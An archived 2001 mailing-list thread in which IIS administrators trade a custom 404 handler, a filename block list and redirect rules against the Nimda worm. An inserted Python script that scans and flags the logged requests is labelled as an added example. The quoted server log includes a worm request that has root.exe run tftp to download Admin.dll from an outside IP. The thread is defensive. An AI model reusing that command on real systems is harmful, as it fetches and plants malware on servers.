Dear Ron:
I wrote you about this earlier and didn't get a reply, please let me know
what you think!
I tried to implement the code you mentioned below but it seems I am still
getting some of those bad requests... see here.
This is the log file from the IMail server (standalone, running Win2K
Server and IIS 5.0 with your ezsignup utility).
20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
Any ideas, maybe I haven't configured it properly? I revised the code a bit
to redirect to the home page after 5 seconds... could that cause it?
Maybe I installed it in the wrong place, please advise me, thanks!
Here is my "version":
<%
'The custom 404 handler receives the original URL in QUERY_STRING
myRequest=Request.ServerVariables("QUERY_STRING")
'A list of filenames the virus looks for, or in this case to protect against
myBadList="cmd.exe,root.exe,admin.dll,default.ida,.exe,.dll,.ida,.htr,.printer"
'Detect a GET request from the Nimda virus and take appropriate action
arrBadString=Split(myBadList,",")
for i=0 to UBound(arrBadString)
'vbTextCompare makes the match case-insensitive (InStr defaults to a binary compare,
'so "admin.dll" would otherwise miss "Admin.dll")
if InStr(1,myRequest,arrBadString(i),vbTextCompare)>0 then
'turn offending server back on itself
Response.redirect "http://127.0.0.1"
end if
next
%>
<HTML>
<HEAD>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<SCRIPT LANGUAGE="JAVASCRIPT">
var timerID="";
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.1">
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.2">
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
</HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR><BR><BR>
<CENTER><STRONG><EM>
<FONT COLOR="#FFFF00" SIZE="+2">sorry..., that page is missing or has been
moved, <br>redirecting to home page.</FONT>
</EM></STRONG></CENTER>
<CENTER><a href="/">Home Page</a>.</CENTER>
<SCRIPT LANGUAGE="JAVASCRIPT">
timerID=setTimeout("loadPage()", 4500);
</SCRIPT>
</BODY>
</HTML>
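The log lines quoted above are the probe requests the Custom404 badlist keys on; a 404 handler can only answer a request that IIS has already received and logged, so such entries keep appearing in the server log whether or not the redirect fires. The Python script below is an added example, not code from this thread or from Humankind Systems: it parses lines in the same layout as the IMail log above (sample lines constructed here, with the invented client 192.0.2.10 making one ordinary request and one FrontPage request to illustrate the admin.dll overlap Chuck Frolick mentions), URL-decodes the query string so the command handed to root.exe is readable, and matches the same filename list case-insensitively (VBScript's InStr defaults to a binary, case-sensitive compare). The `allow_prefixes` parameter is an assumed exclusion list for paths a site legitimately serves.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log in the "<yyyymmdd> <hhmmss> <client-ip>, , , <METHOD> <url> HTTP/<ver>"
# layout of the IMail web-server log quoted in the thread. The first four lines mirror the
# quoted probe; 192.0.2.10 (a documentation address) is an invented client making one
# ordinary request and one FrontPage Server Extensions request to its own admin.dll.
SAMPLE_LOG = """\
20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
20010927 033150 192.0.2.10, , , GET /index.html HTTP/1.0
20010927 033151 192.0.2.10, , , GET /_vti_bin/_vti_adm/admin.dll HTTP/1.0
"""

# Same filenames as the Custom404 badlist in the thread.
NIMDA_NAMES = ("cmd.exe", "root.exe", "admin.dll", "default.ida")

LINE_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) (?P<ip>[\d.]+), , , "
    r"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/(?P<ver>[\d.]+)$"
)


def parse_line(line):
    """Split one log line into fields; the query string is URL-decoded so the
    command the worm passes to root.exe/cmd.exe is readable. Returns None for
    lines that do not match the layout."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["url"].partition("?")
    rec["path"] = path
    rec["query"] = unquote(query.replace("+", " "))
    return rec


def classify(rec, badlist=NIMDA_NAMES, allow_prefixes=()):
    """Return the badlist name found in the request path, or None.

    Matching is case-insensitive ('Admin.dll' in the log must hit 'admin.dll').
    allow_prefixes is an assumed exclusion list for paths a site legitimately
    serves, e.g. FrontPage's /_vti_bin/ tree, which also contains an admin.dll.
    """
    lowered = rec["path"].lower()
    if any(lowered.startswith(p.lower()) for p in allow_prefixes):
        return None
    for name in badlist:
        if name.lower() in lowered:
            return name
    return None


def stage(rec):
    """Label what the decoded query asks root.exe/cmd.exe to do: 'download' when
    it invokes tftp (the worm fetching its payload), 'probe' for other commands
    such as '/c dir', and 'none' when there is no command at all."""
    q = rec["query"].lower()
    if "tftp" in q:
        return "download"
    if q.startswith("/c"):
        return "probe"
    return "none"


def scan(log_text, badlist=NIMDA_NAMES, allow_prefixes=()):
    """Return {client_ip: [(path, decoded_query, matched_name, stage), ...]}
    for every line whose path matches the badlist."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        name = classify(rec, badlist, allow_prefixes)
        if name is not None:
            hits[rec["ip"]].append((rec["path"], rec["query"], name, stage(rec)))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG, allow_prefixes=("/_vti_bin/",)).items():
        print(f"{ip}: {len(events)} matching request(s)")
        for path, query, name, st in events:
            print(f"  {st:8} {name:12} {path} {query}")
```

Run without `allow_prefixes` and the FrontPage request from 192.0.2.10 is reported alongside the real probes, which is exactly the overlap Chuck Frolick warns about; passing `allow_prefixes=("/_vti_bin/",)` keeps the worm's four requests and drops the legitimate one. Decoding the query also turns the second line into a readable `tftp -i ... GET Admin.dll` command, which is the more useful thing to alert on than the 404 itself.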
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
Hornbaker
Sent: Friday, September 21, 2001 2:35 PM
To: [EMAIL PROTECTED]
Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
[isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
If it's a legitimate file, it won't return a 404 error, so the Judo page
won't be triggered. So, technically, you could make your badlist look
something like:
".exe,.dll,.ida,.htr,.printer"
and whatever else you wanted, so that any malicious-looking 404s would be
turned back, Grasshopper-san-style.
Ron Hornbaker
President/CTO
. . . . . . . . . . . . http://humankindsystems.com
. . . . . . . . . . . . w e c o d e. w e c a r e.
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Charles Frolick
> Sent: Friday, September 21, 2001 4:30 PM
> To: [EMAIL PROTECTED]
> Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
>
>
> Not sure how it is used, but FrontPage Extensions actually use an admin.dll
> in the FrontPage directories. Need to make sure your sites don't need it
> for normal operation.
>
> Chuck Frolick
> ArgoNet, Inc.
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
> Hornbaker
> Sent: Friday, September 21, 2001 3:24 PM
> To: [EMAIL PROTECTED]
> Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
>
>
> Change the code to this and just edit the comma-delimited myBadList
> variable:
>
> <%
> 'Custom404.asp page to thwart Nimda DoS attacks on IIS
> 'by Humankind Systems, Inc. http://hksi.net/
> 'No support or guarantees of any kind are granted with this
> 'code. Use at your own risk. Distribute freely.
>
> 'Get the entire URL requested
> myRequest=Request.ServerVariables("QUERY_STRING")
>
> 'A list of filenames Nimda looks for
> myBadList="cmd.exe,root.exe,admin.dll,default.ida"
>
> 'Detect a GET request from the Nimda virus and take appropriate action
> arrBadString=Split(myBadList,",")
> for i=0 to UBound(arrBadString)
> 'vbTextCompare makes the match case-insensitive (InStr defaults to a binary compare)
> if InStr(1,myRequest,arrBadString(i),vbTextCompare)>0 then
> 'turn offending server back on itself
> Response.redirect "http://127.0.0.1"
> end if
> next
> %>
> <html>
> <head>
> <title>Page Not Found</title>
> </head>
> <body>
> Sorry, but that page was not found on our server.
> <p>
> Here is a link back to our <a href="/">Home Page</a>.
> </body>
> </html>
>
>
>
> Ron Hornbaker
> President/CTO
> . . . . . . . . . . . . http://humankindsystems.com
> . . . . . . . . . . . . w e c o d e. w e c a r e.
>
>
>
>
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Len
> > Conrad
> > Sent: Friday, September 21, 2001 3:06 PM
> > To: [EMAIL PROTECTED]
> > Subject: Fwd: [isp-linux] Re: [imail] Buaaa Haaa Ha Haaaaaaaaa...
> >
> >
> > Ron,
> >
> > what about admin.dll, and here's a couple more
> >
> > Len
> >
> > --------------------
> >
> >
> > >From: "Bill Larson" <[EMAIL PROTECTED]>
> > >To: [EMAIL PROTECTED]
> > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa...
> > >Date: Fri, 21 Sep 2001 14:21:24 -0500
> > >X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> > >List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
> > >Reply-To: [EMAIL PROTECTED]
> > >X-INTM-Message-Id: <INTM-62637-1230739-2001.09.21-14.26.57--lconrad#go2france.com@lists.isp-lists.com>
> > >X-Virus-Scanned: by VirusGate.MEIway.com
> > >X-RCPT-TO: <[EMAIL PROTECTED]>
> > >
> > >RedirectMatch (.*)/cmd\.exe$ http://127.0.0.1
> > >RedirectMatch (.*)/default\.ida$ http://127.0.0.1
> > >RedirectMatch (.*)/root\.exe$ http://127.0.0.1
> > >
> > >I added a couple
> > >
> > >----- Original Message -----
> > >From: "Nick Weerheim" <[EMAIL PROTECTED]>
> > >To: <[EMAIL PROTECTED]>
> > >Sent: Friday, September 21, 2001 2:16 PM
> > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa...
> > >
> > >
> > > > this is freaky.... the attacks here have stopped too.... that's crazy.....
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists